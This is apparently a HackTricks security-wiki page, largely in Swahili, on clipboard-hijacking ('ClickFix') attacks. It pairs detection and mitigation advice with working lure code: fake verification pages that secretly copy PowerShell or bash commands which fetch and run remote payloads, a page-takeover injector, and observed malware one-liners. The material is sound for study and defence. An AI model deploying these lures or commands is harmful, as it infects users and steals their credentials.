Clipboard Hijacking (Pastejacking) Attacks

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

“Usibandika chochote ambacho hukinakopi wewe mwenyewe.” – ushauri wa zamani lakini bado unaofaa

Muhtasari

Clipboard hijacking – also known as pastejacking – inanyanyasa ukweli kwamba watumiaji mara kwa mara wanakopa na kubandika amri bila kuzikagua. Ukurasa wa wavuti wenye madhumuni mabaya (au mazingira yoyote yanayounga mkono JavaScript kama Electron au Desktop application) unaweka kwa programu maandishi yanayodhibitiwa na mshambuliaji kwenye system clipboard. Waathirika wanahimizwa, kawaida kupitia maelekezo ya social-engineering yaliyotengenezwa kwa uangalifu, kubonyeza Win + R (Run dialog), Win + X (Quick Access / PowerShell), au kufungua terminal na kubandika yaliyomo kwenye clipboard, kutekeleza mara moja amri yoyote ile.

Kwa sababu hakuna faili inapakuliwa na hakuna kiambatisho kinachofunguliwa, mbinu hii inavuka udhibiti mwingi wa usalama wa barua pepe na wa yaliyomo kwenye wavuti unaofuatilia viambatisho, macros au utekelezaji wa amri moja kwa moja. Kwa hivyo shambulio hili ni maarufu katika kampeni za phishing zinazowaleta familia za malware za kawaida kama NetSupport RAT, Latrodectus loader au Lumma Stealer.

Vitufe vya “Copy” vinavyolazimishwa na payload zilizofichwa (macOS one-liners)

Baadhi ya macOS infostealers huiga tovuti za installer (kwa mfano, Homebrew) na kulazimisha matumizi ya kitufe cha “Copy” ili watumiaji wasiweze kuangazia tu maandishi yanayoonekana. Kuingia kwenye clipboard kunajumuisha amri inayotarajiwa ya installer pamoja na payload ya Base64 iliyoongezwa mwishoni (kwa mfano, ...; echo <b64> | base64 -d | sh), hivyo kubandika mara moja kunatekeleza zote huku UI ikificha hatua ya ziada.

JavaScript Proof-of-Concept

<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
<button id="fix" onclick="copyPayload()">Fix the error</button>
<script>
function copyPayload() {
const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
navigator.clipboard.writeText(payload)
.then(() => alert('Now press  Win+R , paste and hit Enter to fix the problem.'));
}
</script>

Kampeni za zamani zilitumia document.execCommand('copy'), zile mpya zinategemea asynchronous Clipboard API (navigator.clipboard.writeText).

Mtiririko wa ClickFix / ClearFake

  1. Mtumiaji anatembelea tovuti ya typosquatted au compromised (mf., docusign.sa[.]com)
  2. JavaScript iliyochinjwa ya ClearFake inaita helper unsecuredCopyToClipboard() ambayo kwa kimya inaweka Base64-encoded PowerShell one-liner kwenye clipboard.
  3. Maelekezo ya HTML yanaambia mwathiriwa: “Bonyeza Win + R, paste amri na bonyeza Enter ili kutatua tatizo.”
  4. powershell.exe inatekeleza, ikipakua archive inayojumuisha executable halali pamoja na malicious DLL (classic DLL sideloading).
  5. The loader decrypts additional stages, injects shellcode and installs persistence (e.g. scheduled task) – ultimately running NetSupport RAT / Latrodectus / Lumma Stealer.

Mfano wa mnyororo wa NetSupport RAT Chain

powershell -nop -w hidden -enc <Base64>
# ↓ Decodes to:
Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
%TEMP%\f\jp2launcher.exe             # Sideloads msvcp140.dll
  • jp2launcher.exe (legitimate Java WebStart) inatafuta kwenye saraka yake msvcp140.dll.
  • DLL hasidi inatatua APIs kwa wakati wa utekelezaji kwa GetProcAddress, inapakua binaries mbili (data_3.bin, data_4.bin) kupitia curl.exe, decrypts them using a rolling XOR key "https://google.com/", inaingiza shellcode ya mwisho na inaifungua client32.exe (NetSupport RAT) hadi C:\ProgramData\SecurityCheck_v1\.

Latrodectus Loader

powershell -nop -enc <Base64>  # Cloud Identificator: 2031
  1. Inapakua la.txt na curl.exe
  2. Inaendesha JScript downloader ndani ya cscript.exe
  3. Inapata payload ya MSI → inaweka libcef.dll kando ya programu iliyosainiwa → DLL sideloading → shellcode → Latrodectus.

Lumma Stealer kupitia MSHTA

mshta https://iplogger.co/xxxx =+\\xxx

Mwito wa mshta huchochea script iliyofichwa ya PowerShell ambayo inapokea PartyContinued.exe, inatoa Boat.pst (CAB), inajenga upya AutoIt3.exe kwa kutumia extrac32 na kuunganisha mafaili, na mwishowe inaendesha script .a3x ambayo inexfiltrates browser credentials kwa sumeriavgv.digital.

ClickFix: Clipboard → PowerShell → JS eval → Startup LNK with rotating C2 (PureHVNC)

Baadhi ya kampeni za ClickFix hupuuza kabisa upakuaji wa faili na kuwaamrisha wahanga kubandika one‑liner inayopakua na kuendesha JavaScript kupitia WSH, kuiweka kudumu, na kubadilisha C2 kila siku. Mfano wa mnyororo ulioshuhudiwa:

powershell -c "$j=$env:TEMP+'\a.js';sc $j 'a=new
ActiveXObject(\"MSXML2.XMLHTTP\");a.open(\"GET\",\"63381ba/kcilc.ellrafdlucolc//:sptth\".split(\"\").reverse().join(\"\"),0);a.send();eval(a.responseText);';wscript $j" Prеss Entеr

Sifa kuu

  • URL iliyofichwa ilirejeshwa wakati wa runtime ili kuepuka uchunguzi wa kirahisi.
  • JavaScript hujiendeleza kupitia Startup LNK (WScript/CScript), na huchagua C2 kwa siku ya sasa – enabling rapid domain rotation.

Fragmenti ndogo ya JS inayotumika ku-rotate C2s kwa tarehe:

function getURL() {
var C2_domain_list = ['stathub.quest','stategiq.quest','mktblend.monster','dsgnfwd.xyz','dndhub.xyz'];
var current_datetime = new Date().getTime();
var no_days = getDaysDiff(0, current_datetime);
return 'https://'
+ getListElement(C2_domain_list, no_days)
+ '/Y/?t=' + current_datetime
+ '&v=5&p=' + encodeURIComponent(user_name + '_' + pc_name + '_' + first_infection_datetime);
}

Kiwango kinachofuata mara nyingi hutoa loader ambayo inaimarisha persistence na huvuta RAT (mfano, PureHVNC), mara nyingi ikipiga TLS kwenye hardcoded certificate na chunking traffic.

Detection ideas specific to this variant

  • Process tree: explorer.exepowershell.exe -cwscript.exe <temp>\a.js (or cscript.exe).
  • Startup artifacts: LNK in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup invoking WScript/CScript with a JS path under %TEMP%/%APPDATA%.
  • Registry/RunMRU and command‑line telemetry containing .split('').reverse().join('') or eval(a.responseText).
  • Repeated powershell -NoProfile -NonInteractive -Command - with large stdin payloads to feed long scripts without long command lines.
  • Scheduled Tasks that subsequently execute LOLBins such as regsvr32 /s /i:--type=renderer "%APPDATA%\Microsoft\SystemCertificates\<name>.dll" under an updater‑looking task/path (e.g., \GoogleSystem\GoogleUpdater).

Threat hunting

  • Daily‑rotating C2 hostnames and URLs with .../Y/?t=<epoch>&v=5&p=<encoded_user_pc_firstinfection> pattern.
  • Correlate clipboard write events followed by Win+R paste then immediate powershell.exe execution.

Blue-teams can combine clipboard, process-creation and registry telemetry to pinpoint pastejacking abuse:

  • Windows Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU keeps a history of Win + R commands – look for unusual Base64 / obfuscated entries.
  • Security Event ID 4688 (Process Creation) where ParentImage == explorer.exe and NewProcessName in { powershell.exe, wscript.exe, mshta.exe, curl.exe, cmd.exe }.
  • Event ID 4663 for file creations under %LocalAppData%\Microsoft\Windows\WinX\ or temporary folders right before the suspicious 4688 event.
  • EDR clipboard sensors (if present) – correlate Clipboard Write followed immediately by a new PowerShell process.

IUAM-style verification pages (ClickFix Generator): clipboard copy-to-console + OS-aware payloads

Campaigns za hivi karibuni zinafanya kwa wingi kurasa bandia za CDN/browser za uhakiki (“Just a moment…”, IUAM-style) ambazo zinafanya watumiaji kunakili amri maalum za OS kutoka clipboard yao na kuzileta kwenye consoles za native. Hii inaondoa utekelezaji kutoka kwenye browser sandbox na inafanya kazi kwenye Windows na macOS.

Key traits of the builder-generated pages

  • OS detection via navigator.userAgent to tailor payloads (Windows PowerShell/CMD vs. macOS Terminal). Optional decoys/no-ops for unsupported OS to maintain the illusion.
  • Automatic clipboard-copy on benign UI actions (checkbox/Copy) while the visible text may differ from the clipboard content.
  • Mobile blocking and a popover with step-by-step instructions: Windows → Win+R→paste→Enter; macOS → open Terminal→paste→Enter.
  • Optional obfuscation and single-file injector to overwrite a compromised site’s DOM with a Tailwind-styled verification UI (no new domain registration required).

Mfano: clipboard mismatch + OS-aware branching

<div class="space-y-2">
<label class="inline-flex items-center space-x-2">
<input id="chk" type="checkbox" class="accent-blue-600"> <span>I am human</span>
</label>
<div id="tip" class="text-xs text-gray-500">If the copy fails, click the checkbox again.</div>
</div>
<script>
const ua = navigator.userAgent;
const isWin = ua.includes('Windows');
const isMac = /Mac|Macintosh|Mac OS X/.test(ua);
const psWin = `powershell -nop -w hidden -c "iwr -useb https://example[.]com/cv.bat|iex"`;
const shMac = `nohup bash -lc 'curl -fsSL https://example[.]com/p | base64 -d | bash' >/dev/null 2>&1 &`;
const shown = 'copy this: echo ok';            // benign-looking string on screen
const real = isWin ? psWin : (isMac ? shMac : 'echo ok');

function copyReal() {
// UI shows a harmless string, but clipboard gets the real command
navigator.clipboard.writeText(real).then(()=>{
document.getElementById('tip').textContent = 'Now press Win+R (or open Terminal on macOS), paste and hit Enter.';
});
}

document.getElementById('chk').addEventListener('click', copyReal);
</script>

macOS persistence ya initial run

  • Tumia nohup bash -lc '<fetch | base64 -d | bash>' >/dev/null 2>&1 & ili utekelezaji uendelee baada ya terminal kufungwa, na kupunguza artifacts zinazoonekana.

In-place page takeover kwenye compromised sites

<script>
(async () => {
const html = await (await fetch('https://attacker[.]tld/clickfix.html')).text();
document.documentElement.innerHTML = html;                 // overwrite DOM
const s = document.createElement('script');
s.src = 'https://cdn.tailwindcss.com';                     // apply Tailwind styles
document.head.appendChild(s);
})();
</script>

Detection & hunting ideas specific to IUAM-style lures

  • Web: Pages that bind Clipboard API to verification widgets; mismatch between displayed text and clipboard payload; navigator.userAgent branching; Tailwind + single-page replace in suspicious contexts.
  • Windows endpoint: explorer.exepowershell.exe/cmd.exe shortly after a browser interaction; batch/MSI installers executed from %TEMP%.
  • macOS endpoint: Terminal/iTerm spawning bash/curl/base64 -d with nohup near browser events; background jobs surviving terminal close.
  • Correlate RunMRU Win+R history and clipboard writes with subsequent console process creation.

See also for supporting techniques

Clone a Website

Homograph Attacks

2026 fake CAPTCHA / ClickFix evolutions (ClearFake, Scarlet Goldfinch)

  • ClearFake continues to compromise WordPress sites and inject loader JavaScript that chains external hosts (Cloudflare Workers, GitHub/jsDelivr) and even blockchain “etherhiding” calls (e.g., POSTs to Binance Smart Chain API endpoints such as bsc-testnet.drpc[.]org) to pull current lure logic. Recent overlays heavily use fake CAPTCHAs that instruct users to copy/paste a one-liner (T1204.004) instead of downloading anything.
  • Initial execution is increasingly delegated to signed script hosts/LOLBAS. January 2026 chains swapped earlier mshta usage for the built-in SyncAppvPublishingServer.vbs executed via WScript.exe, passing PowerShell-like arguments with aliases/wildcards to fetch remote content:
"C:\WINDOWS\System32\WScript.exe" "C:\WINDOWS\system32\SyncAppvPublishingServer.vbs" "n;&(gal i*x)(&(gcm *stM*) 'cdn.jsdelivr[.]net/gh/grading-chatter-dock73/vigilant-bucket-gui/p1lot')"
  • SyncAppvPublishingServer.vbs imesainiwa na kwa kawaida hutumiwa na App-V; ikishirikishwa na WScript.exe na hoja zisizo za kawaida (gal/gcm aliases, wildcarded cmdlets, jsDelivr URLs) inakuwa hatua ya LOLBAS yenye ishara kubwa kwa ClearFake.
  • Februari 2026 fake CAPTCHA payloads zilirudi kwenye njia safi za upakuaji za PowerShell. Mifano miwili hai:
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -c iex(irm 158.94.209[.]33 -UseBasicParsing)
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$w=New-Object -ComObject WinHttp.WinHttpRequest.5.1;$w.Open('GET','https[:]//cdn[.]jsdelivr[.]net/gh/www1day7/msdn/fase32',0);$w.Send();$f=$env:TEMP+'\FVL.ps1';$w.ResponseText>$f;powershell -w h -ep bypass -f $f"
  • Mlolongo wa kwanza ni grabber ya in-memory iex(irm ...); ngazi ya pili inafanya stage kupitia WinHttp.WinHttpRequest.5.1, inaandika .ps1 ya muda, kisha inaanzisha na -ep bypass katika dirisha lililofichwa.

Detection/hunting tips for these variants

  • Process lineage: kivinjari → explorer.exewscript.exe ...SyncAppvPublishingServer.vbs au PowerShell cradles mara moja baada ya clipboard writes/Win+R.
  • Command-line keywords: SyncAppvPublishingServer.vbs, WinHttp.WinHttpRequest.5.1, -UseBasicParsing, %TEMP%\FVL.ps1, jsDelivr/GitHub/Cloudflare Worker domains, au raw IP iex(irm ...) patterns.
  • Network: outbound to CDN worker hosts au blockchain RPC endpoints kutoka kwa script hosts/PowerShell shortly after web browsing.
  • File/registry: temporary .ps1 creation under %TEMP% pamoja na RunMRU entries zinazoonyesha one-liners hizi; block/alert on signed-script LOLBAS (WScript/cscript/mshta) executing with external URLs au obfuscated alias strings.

Mitigations

  1. Kuimarisha kivinjari – disable clipboard write-access (dom.events.asyncClipboard.clipboardItem etc.) au require user gesture.
  2. Uelewa wa usalama – fundisha watumiaji ku-type amri nyeti au kuzibandika kwenye text editor kwanza.
  3. PowerShell Constrained Language Mode / Execution Policy + Application Control kuzuia arbitrary one-liners.
  4. Dhibiti mtandao – block outbound requests kwa known pastejacking na malware C2 domains.
  • Discord Invite Hijacking mara nyingi hutumia same ClickFix approach baada ya kuwavuta watumiaji kwenye server hatari:

Discord Invite Hijacking

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks